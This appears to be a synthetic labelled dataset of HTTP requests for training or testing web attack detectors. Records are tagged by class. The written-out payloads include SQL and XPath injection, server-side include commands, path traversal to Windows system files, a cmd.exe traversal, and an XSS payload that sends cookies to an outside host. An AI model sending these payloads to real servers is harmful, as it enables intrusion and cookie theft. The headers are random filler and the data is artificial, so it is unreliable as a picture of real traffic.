GET /@W09CnI7j3hKXD.js?85CtjiAo=%27++++%29+++UNION+++ALL+SELECT+++erz++%2C+++++9osoia2m++%2C+++cielwkks++++FROM+++++ali7+WHERE+++imjeea+++++NOT++++IN+++%28++%27Md%27+++%29++AND+oxSot6ihte+NOT+++IN+++++%28%27ahee44%27+++%29++++AND+%27%27+%3D+%27&at=jritd7pR40DcWo&eiOo=sXo%3Fo&egththi1=8dLiJJBr HTTP/1.1
Host: 197.242.134.107
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale=1
Client-ip: 88.195.225.227
Cookie: oq7seNzswe=skd6b-xyGO;e2ewaoaOp=0
Cookie2: $Version="3"
Date: Tue, 09 Nov 04 10:49:37 UTC
ETag: "Fg4GgecH.zX4nmej"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Tue, 01 Mar 05 11:00:45 CET
If-Unmodified-Since: Mon, 07 May 07 16:26:46 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 30
MIME-Version: 9.0
Pragma: otoepa6='oEDisdE'
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: lnre ewrw8=aEasc
Range: -9
Referer: /dwH1/yH25g/87oaame.ace
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.3 (compatible; MSIE 8.6; Unix; thdsbK; eTfLa6deEa; uiitte)
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: compress
Upgrade: nhii/6.1, lbree/5.0
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42462
Start - Id: 40460
class: SSI
GET /NRnT/hsXXxv6ywP1eFgDIUt/YvBlR/a0OHCk_W-dHXX2Ib/osncuLaw2etudoiaenl/tDuXuUIV8NY63nL/bjb1meU/uC..FXA3_@3arc.tiff?nw0oiqoe=%5Chtaccesdtdildato&eateij=044105&dateaces=V&eognisNnt=S%3Az&aenl3Deu=rlftH5e8trorz&Y4UH7shutdownGeM=6oeeR&reryw=%3C%21--+%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E HTTP/1.1
Host: 18.8.203.25
Connection: keep-alive
Accept: application/x-tar;q=0.8, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=52
Client-ip: 136.51.172.248
Cookie: qM=fgw1FA@R;itdnlzsd=67
Cookie2: $Version="974"
Date: Sat, 06 Feb 10 07:38:34 GMT
ETag: W/"Ga390QO1LwdAjTWTo"
Expect: 100-continue
From: npmo@pBctcq.com
If-Modified-Since: Mon, 04 Dec 06 07:58:31 UTC
If-Unmodified-Since: Mon, 10 Sep 07 06:33:55 CET
If-Match: "hnlprMaR_ECNmuQFDnH"
If-None-Match: *
If-Range: Sat, 09 May 09 04:24:11 GMT
Max-Forwards: 9463
MIME-Version: 4.8
Pragma: bjsdatow='earl4mA'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest nc=D38F6D6F
Range: 688-12571,5864-06540,0825-1066
Referer: /oeeO/eEsjm9E/stg4m.wav
TE: trailers,chunked;q=0.9
Trailer: Max-Forwards
User-Agent: sreteGuf (aWfeo4UYN; m.Jja53; smOE@N; civD_U; qwxQEd)
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 025x185
Via: 8.0 www.fflct.shtml, 3.4 251.66.17.2
Transfer-Encoding: gzip
Upgrade: ytiE/1.4
Warning: 466 70.136.39.206 "sssc" 
X-Forwarded-For: 109.247.28.154
X-Serial-Number: 98565372421828
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40460
Start - Id: 44785
class: PathTransversal
GET /nSoee5neo/uBTkfje5P25F/0iheottS9nOa1/eQrr0PMTseCE.js?nnimh=l5EKoIJJWsQ&ueeag7eirtg=group+byulah&0er9biennnoipT=mKsyFl&0reilah=qSEPv&ccbeacldfyr=.%2F..%2F.%2F..%2F HTTP/1.1
Host: www.cj0t.uk
Connection: keep-alive
Accept: audio/basic, text/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 108.193.198.116
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="24"
Date: Sat, 24 Feb 07 21:06:51 GMT
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Thu, 31 Aug 06 03:55:02 GMT
If-Unmodified-Since: Wed, 23 Jun 04 13:11:17 CET
If-Match: "sPWC.fHCQuoked6"
If-None-Match: *
If-Range: "NYDM9Fj.6MInSwRm"
Max-Forwards: 844
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c0lyb3NlYTRVYWluMmhpY3d0YnRCZXRUd3l0dGNlb2RvdXRyZGx2cnlh
Authorization: Basic bnRydEJlQTpxbWRR
Range: 39-79901,6-
Referer: /ohmhpt/anj8aw7T/htotfer/0tAe/rrchgp.jsp
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/6.7 (compatible; Konqueror/3.6; Linux i386; antt9eUf2; Cr9oSj3aN)
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 1.2 160.216.253.69
Transfer-Encoding: identity
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44785
Start - Id: 45559
class: PathTransversal
GET /dY9F2aYAD1P/ejOWBy98tsrN5lIpBaKk/mthbitm7aae/vKG5.js?C-NQc=N3&divqDL@..SMUQ1=hJTcfe&pzdin=ehas&uom=Xttaehwaft&ala=phr%5Cx&twftn8abeie7aCd=228&aeoehm62nw7yft4=aaYf&c1rb=toptbseando6mNiwnmnjbciw&DKt_httpyFnetcat=73724900&0aoc0aayn2ot=laeymoNh5syniorli9&etare6feoh=eYH5dBBkRU&7s3=zoncqfteB&JodocumentOkiDYAY8T=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Rk1TGsswP=3&oT0p0x7J8X=fs6gzmu HTTP/1.0
Host: www.i7onIsmT.biz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 104.148.213.220
Cookie: nori=tx8anAA
Cookie2: $Version="087"
Date: Thu, 08 Oct 09 09:05:57 GMT
ETag: "Dd.eCaTbLqCEr1yBdQ5"
Expect: eeretq5E=a2orjnoo;dn0g
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 742
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -7305
Referer: http://Eewoaeh.de/timhpeht/wpts/ss3egeo/pRln.css
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: btwoSee (rkLT_h1oi6; iUo3zEA; tl5_A_61H)
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: HTTP/8.0 155.18.101.99, 6.7 www.vn1at4ir.css, 5.1 208.168.129.29:3
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45559
Start - Id: 45724
class: PathTransversal
GET /sodeciOvkCnJU/lsVZy@dZunion6yh/wrcotscjorsrJefas4e/f_a2-jHXLQ@32/HX1sNpWGM/trteranweHthb/ehzi/iuhaabfjqdk/hcooeurdi5ybsrh4w/aeL5xW/hodnuh8rraos1/sfrlnzIafDXerIslptat.exe?ead4eE=8&srp=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&usr35Emetaz=ga&tfPAnnyrnsertt=5375&nzWNUKJB=9&dhtapFMfie=737466&x7oiielykp4c=hdropqhoL&tabrzeo4=a3kNZ_&sb395uthfsc=ttR3wjrTou&gr5Namerm=701656764&MZn-x7FX=meaf1n6y9zaH&POiPS7=48 HTTP/1.0
Host: 129.63.44.226:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate;q=0.7, compress, deflate, identity;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 19.222.68.7
Cookie: hyie1eo8leaOepu=612368;.6Vp1rSP4itH=epi\koouth
Cookie2: $Version="66"
Date: Wed, 14 Feb 07 07:49:43 UTC
ETag: "mTtiXIAF-Pxqu8_GE"
Expect: E8io1m=9m68xA;ctn5kTae=znnvtbd
From: reani1tb@daeireeubl.de
If-Modified-Since: Thu, 01 Sep 05 07:13:04 CET
If-Unmodified-Since: Fri, 08 Sep 06 24:58:48 UTC
If-Match: "mSqq2cx6I3Tvl1CMg1-"
If-None-Match: *
If-Range: Sat, 15 Mar 08 17:16:29 CET
Max-Forwards: 0
MIME-Version: 2.1
Pragma: no=rcrt
Proxy-Authorization: Digest realm
Authorization: Digest opaque="pTar"
Range: -500252,934-3694
Referer: http://www.emoo.com/iscig.mdb
TE: chunked;q=0.2,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 7.9; at-oy; rv:2.6.4) Gecko/50410702
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 534x391
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: 827xm; sopoib=qns759
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 159.195.9.102
X-Serial-Number: 1618317
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45724
Start - Id: 47452
class: XSS
GET /3th/uHcopyTSQ6U3cO/iwLGwQzl@dh8zFwK/yX7DphIBzxbYpNVqfC/oaEvecadkn/ei/I8iVNahMSE8OG.shtml?oeye4b=k2ansFhbtqthnapc&Eo=%3Cobject++classid+++%3D+%22+++clsid%3A...+++%22++codebase+%3D++%22+++javascript%3A+++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.issiesge.com%2Fcgi-bin%2For.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&iiD=6106328804 HTTP/1.1
Host: www.lhnind.ch
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, euc-tw, iso-8859-8-i, x-mac-cyrillic;q=0.8
Accept-Encoding: *
Accept-Language: saadOph-rs0roirk, r30ornE-mT4rn9hs, 52tnyjt-shjduT;q=0.8
Cache-Control: 2nnxr=rnsuu
Client-ip: 184.47.37.121
Cookie: tva=uwindow.openhome1;rWuiutYt=65355443;weowtOrs= as;ugeeflvtll=brdnh;r4trn=83;Iynei4tixx=39
Cookie2: $Version="073"
Date: Fri, 15 Sep 06 02:00:46 UTC
ETag: W/"rp9_AP4VQ-1SnvWS"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 19 Dec 07 13:59:23 UTC
If-Unmodified-Since: Mon, 29 Nov 04 18:59:54 GMT
If-Match: *
If-None-Match: *
If-Range: "-V7trL._44NNv6QZg"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=erorm7y
Range: 9547-817639
Referer: http://afrds.org/oqaar4.mspx
TE: chunked
Trailer: From
User-Agent: Mozilla/3.3 (Windows; U; WinNT 1.1; hs-Sx; rv:7.5.5) Gecko/24010812
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: mus4pe
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 188.156.102.66
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47452
Start - Id: 35904
class: XPathInjection
PUT /eu9o0laryEsnSoleL/3neorOlsF4rheledbM/dSve9/fQ7q.png? HTTP/1.1
Content-Length: 54
Content-Language: tt,t0o
Content-Encoding: deflate
Content-Location: http://www.door.net/Ton3tta.pl
Content-MD5: MEUwckdkMHQ4RWxlbk4xcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Mar 08 20:12:22 GMT
Host: www.gnatRreetR.st
Connection: etlbp
Accept: image/gif, application/*;q=0.4
Accept-Charset: iso-8859-9;q=0.1, euc-jp, iso-8859-8
Accept-Encoding: 
Accept-Language: aael-sPsrnr;q=0.2
Cache-Control: max-age=02
Cookie: veom=hAla;6_F9xp_PODZZ8@=iqyrPlQntYew;pma=cx2dear' or     6     < count(path/child::*) or   'hE'    = ';seni2sToi=se|yeid sedsam;2ri9rieaOh8ypr=binrt2hrconRit
ETag: "Bzoc8UdSY@DevQT"
If-Modified-Since: Wed, 01 Dec 04 11:23:49 GMT
Max-Forwards: 6092
Proxy-Authorization: Basic Z2R0ZzpmMXRydGg=
Referer: http://www.8cit.st/eoarant.dll
TE: trailers,chunked,chunked
User-Agent: Mozilla/5.9 (Windows; U; WinNT 2.3; eh-fo; rv:3.2.2) Gecko/70365337
Via: 2.3 www.aAelpeo.htm, 7.0 www.eoStj.js:65796

b55eh=clrsti8hiic1nh&nrn7=48029&3ejl=12&etosv=89998618

End - Id: 35904
Start - Id: 44798
class: PathTransversal
GET /lGE3P7lptl/vjorwdEaitNpt9Msh/r1Ee/Y1ZXVX.cfm?pacsmesey=tUs3U&rihatEcaz=e%2Feq&efajaaisytRtb=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&gnv=dIadh2ath3dr&nhrsmat2y=5fM.xLP&a9aitilefmvatn=elE HTTP/1.0
Host: 98.253.157.131
Connection: close
Accept: text/*;q=0.8, video/*
Accept-Charset: x-mac-japanese;q=0.2, isiri-3342;q=0.2, windows-1253, cp-936
Accept-Encoding: identity, gzip;q=0.5, deflate;q=0.8
Accept-Language: tti-fsel;q=0.6, t2rr-eUmttE;q=0.1
Cache-Control: max-stale=99726
Client-ip: 251.54.255.245
Cookie: 2toh3t1aedimlRb=r:sxp_y
Cookie2: $Version="73"
Date: Sun, 13 Jan 08 19:52:20 GMT
ETag: W/"djyw31vse5DU8jEaNO_"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 19 Jul 05 15:44:20 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Sep 09 11:40:45 GMT
Max-Forwards: 492
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: rldnpD 5eeMee=beaoeu
Range: -31658,860-,84040-975982
Referer: /iOZfH/arht.cgi
TE: trailers
Trailer: Expect
User-Agent: r.phQjS http://www.lni2s.com
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 5.4 www.enssad.htm:39
Transfer-Encoding: pSsmi; 6hsAorn=rdWo
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 2157159271334
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44798
Start - Id: 41910
class: SqlInjection
GET /QjiZ/6@Po/dunnhvhenlsralaot8/jtsdoOs4qfrtn/08IDael4haratxonlb/eclIhrln1v/F9DMiqMSN_tdr9https.jpeg?wHuhEbarsnw=%27++%2B++%28+SELECT+++++TOP++1+++rl+++FROM+thYarYp%29+%2B++++%27&VpDDgLZ=2512624&uEso82=xoHV0Ju&Src485ht=862&rRenSc=470 HTTP/1.0
Host: 3.6.209.72
Connection: mTelzLi
Accept: text/xml, application/*
Accept-Charset: hz-gb-2312;q=0.5, iso-8859-8, iso-8859-8;q=0.1
Accept-Encoding: identity, identity, compress, identity, gzip;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 199.227.44.84
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="2"
Date: Fri, 28 May 04 12:18:32 GMT
ETag: W/"0EKNpBL.NFJRNzsO.eU"
Expect: reyI=leeee
From: whodpi@rrheriuA.net
If-Modified-Since: Fri, 12 Mar 04 08:30:43 UTC
If-Unmodified-Since: Mon, 04 Feb 08 19:05:56 CET
If-Match: "7k84Q-g8qC-HE-ARv"
If-None-Match: "t.FxVG.n7SP9q.4jm"
If-Range: Fri, 30 Sep 05 15:38:11 UTC
Max-Forwards: 95
MIME-Version: 4.7
Pragma: eoantyc='asuum7'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: NTLM TnR0Y2I2bm5kbG9tc2FlbHMwb2l1b3FsZGUzZXJhb25hc3NtZGphdWRhSXNlaXRu
Range: 301875-45,510153-7
Referer: http://stysotei.ch/wxplv/ei7en/bwiqcon/nnhloybn.php
TE: gzip
Trailer: Via
User-Agent: r9Rnt7 (s-67_iC; nq3SX4qeL; oS7G7q_Mp; wyswsbI; pfakgYG)
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: identity
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 693 www.eetix.jpg "disicab5cesf" "Tue, 14 Aug 07 21:20:16 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41910
Start - Id: 39997
class: SSI
GET /riq3crqA9cencemnN/jd/sM@nIX3Hpna/axHLG/d_uWk-lcaONH/comegaXinigan/dDeAiJbB-mT/2Fh9wQtVI/eeek/Gw/ebollroreFuutny.asp?tAia=64892&tesNsllde=%3C%21+++%23%3C%21--++%23exec++cmd%3D%22id%22--%3E&d2mn7tg1aLySc=98067781 HTTP/1.0
Host: www.e5eInlrme.gov:80
Connection: keep-alive
Accept: application/rtf;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: tpt2r-xe;q=0.8
Cache-Control: no-transform
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Sun, 06 Mar 05 21:23:05 CET
ETag: W/"snzYcROZfCdT0_HXP"
Expect: i6odg8a
From: atetgwlh@rphs.com
If-Modified-Since: Fri, 06 Jul 07 05:07:27 GMT
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "JqJ7.a5rHK9o0un.us0q"
If-None-Match: *
If-Range: *
Max-Forwards: 56
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM eGVoYU44dHJtYXJUODcyZWV6b25idTRpN3RpMmMzcmlEYnY0MW5qcmFjQQ==
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: /eowe.msf
TE: trailers
Trailer: TE
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 9.3; Ha-au; rv:3.3.8) Gecko/35525083
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: 3.4 68.113.226.149, HTTP/9.7 www.iibn.jpeg, 2.5 www.qrGi.jpeg
Transfer-Encoding: noosa
Upgrade: tati1/9.0, By2egw/7.7, naml/5.4, tau/2.1, 0aZt7/2.6
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39997
Start - Id: 49934
class: XPathInjection
GET /t3RfiVAUOIIUXTQs9SO@/d6poe/emtLsnlhl.exe?teOenm=rg&EuunOlgybdebhy=68963615&zmNawYo=udinhtv&e4oi8ec=1539490&oetNaueopoo=E1n%27++++or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+i%2Bj+++%2B+++k+%2B+++l++%2B++++1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++%27hude%27+%3D++++%27+++rinaD%27++++or HTTP/1.0
Host: www.gsiTruanx.it:13884
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ec4o-iysim, nessrmnr-r, umi-e8d1f, wmo-2Htrg
Cache-Control: min-fresh=62
Client-ip: 69.149.110.120
Cookie: Zv3u=cVv6Cq_C9NJ2;ndseloehnNPs=Ltnjo7nr( 
Cookie2: $Version="5"
Date: Thu, 24 Aug 06 17:47:23 CET
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Tue, 20 Jan 09 05:31:29 GMT
If-Unmodified-Since: Wed, 29 Dec 04 15:56:13 CET
If-Match: *
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: *
Max-Forwards: 428
MIME-Version: 7.1
Pragma: D=o
Proxy-Authorization: Basic dGxpYTlzaTowbGVz
Authorization: aeNs hz4l=lmNso
Range: 53346-
Referer: http://www.eaianfu.be/r9itWs/trwm1e1g/ietinte/heontq/fhtwrw.txt
TE: trailers,trailers
Trailer: Via
User-Agent: soonfel/9.1.7
UA-CPU: x86
UA-Disp: 3308,0110,8
UA-OS: Solaris
UA-Pixels: 299x2707
Via: 0.5 www.uDretah4.css:36993, 1.1 www.45Taltn.jpeg:00787
Transfer-Encoding: gzip
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49934
Start - Id: 48665
class: XPathInjection
POST /hngEethnHhooc/iframe2s/lLifmNR3x-OTFf/n4ezK2MIWfWqqwNVrj2/rF4x5A4iR4@3M_W3pEld/srdacfV.png? HTTP/1.1
Content-Length: 126
Content-Language: gftt
Content-Encoding: compress
Content-Location: /r7VHedxp/iIumhr.asmx
Content-MD5: VW5ha1NhNmRuNW5Hc2xkaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: www.schmTLm.it:212
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-8, iso-8859-6, iso-8859-8-i
Accept-Encoding: gzip, deflate, deflate
Accept-Language: a8tza-q;q=0.5
Cache-Control: no-transform
Client-ip: 243.130.65.178
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="00"
Date: Wed, 25 Feb 09 13:56:48 CET
ETag: "cnauA-Zw-FFdJ3uxZP0"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Thu, 16 Apr 09 05:33:43 GMT
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM cXRpQWFnd2NlemgwdjBhZXNsaWRzc3NvZWV0MmVveW5sbg==
Authorization: NTLM aDBUTGRvYXhlbWFhamFlNTJjZHhkbmRheXVpYWdJYWxyaG5ZZGZG
Range: 12-
Referer: /hgoas/neT4/tetSrot.tiff
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.9 (Windows; U; Win98 1.2; ie-ef; rv:6.6.6) Gecko/47103491
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 5.7 www.5cldeueu.shtml
Transfer-Encoding: 75ipd; dwidtOt=nElnan
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 105.28.18.229
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

YvGqJ=seb5red'   or  c9aer/fdeqie/child::node()[processing-instruction()=9]  or     '3c'    ='

End - Id: 48665
Start - Id: 37844
class: LdapInjection
GET /wyt5teloaeddnde/rY/sdiNjvtT/tZVjBB8/ibrfonio4atfnnRcclse/aw/o9/FnBT/5A0asiduncdocumentTc/MZATZ/emvq3aUn.exe?vJS1oQE.Ssmeta=513618&Tny=11716&mrpelit=7r&foai=%29%28++++%7C++%2875%3Darse*%29 HTTP/1.0
Host: www.ofhkie.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1251;q=0.3
Accept-Encoding: *
Accept-Language: 09nna-eaaJxk, o-ieisT, Iai6l-8gno;q=0.2, hlrlise-3he, rQho-rineu751;q=0.5
Cache-Control: nelst='trmoredq'
Client-ip: 2.231.54.23
Cookie: 0c.0ilsocdM.e=servicesn;Tosl=742182;t6s4Mk8rrEme=eotKsroSZo
Cookie2: $Version="033"
Date: Fri, 29 Jul 05 02:43:54 GMT
ETag: "v.u7W79d5gfnlTy"
Expect: dNnesabo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Fri, 09 Mar 07 23:25:53 CET
If-Match: *
If-None-Match: "Q.qUhF_Qgyjhz8Oom"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.1
Pragma: a8veae=fheo
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: hsedo sch1rnta=hqovoe
Range: 853418-,-430
Referer: /dtiehr/ruahuo.txt
TE: trailers
Trailer: Accept
User-Agent: odrgyrr9c/7.8.6
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: 7.4 61.98.87.250, FTP/1.6 34.17.157.12, 1.8 189.134.7.1:02
Transfer-Encoding: gzip
Upgrade: uoE/5.1, iitjl/6.0
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37844
Start - Id: 44482
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 157.207.95.108:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-8
Accept-Encoding: gzip;q=0.9, gzip, gzip, deflate;q=0.1
Accept-Language: *;q=0.5
Cache-Control: oha3nne=Inxijc
Client-ip: 95.194.5.171
Cookie: epevdnh6Litaerv=dvTdcWBzD;Scruoooo=stoSoaehae1;deTce252ako=oteincludeluRtd0dee>tChmo6
Cookie2: $Version="960"
Date: Mon, 13 Jun 05 11:36:18 CET
ETag: W/"tWaGECFfpG_GilO7"
Expect: nets=rpaui;afeisve8=e88t
From: xeaiisnn@jemn.de
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Tue, 07 Oct 08 21:39:33 GMT
If-Match: "mCRsXZaQTbu9HpHL"
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: Thu, 05 Jan 06 06:45:25 UTC
Max-Forwards: 7
MIME-Version: 9.7
Pragma: e='etee'
Proxy-Authorization: Digest cnonce="suean1t"
